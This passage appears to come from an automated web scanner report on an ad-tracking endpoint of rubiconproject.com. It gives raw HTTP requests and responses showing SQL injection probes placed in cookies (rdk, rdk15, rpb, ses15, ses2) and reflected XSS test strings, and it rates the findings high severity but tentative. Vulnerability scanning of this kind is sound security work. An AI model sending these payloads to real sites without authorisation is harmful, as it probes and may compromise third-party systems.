Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d1--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: dq=49|4|45|0; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d2--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.32. http://tap.rubiconproject.com/oz/sensor [rdk15 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The rdk15 cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the rdk15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d1--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: dq=92|4|88|0; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d2--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.33. http://tap.rubiconproject.com/oz/sensor [rpb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d1--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d2--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

1.34. http://tap.rubiconproject.com/oz/sensor [ses15 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The ses15 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ses15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d1--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:18 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d2--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:19 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.35. http://tap.rubiconproject.com/oz/sensor [ses2 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The ses2 cookie appears to be vulnerable to SQL injection attacks. The payloads 20978879'%20or%201%3d1--%20 and 20978879'%20or%201%3d2--%20 were each submitted in the ses2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
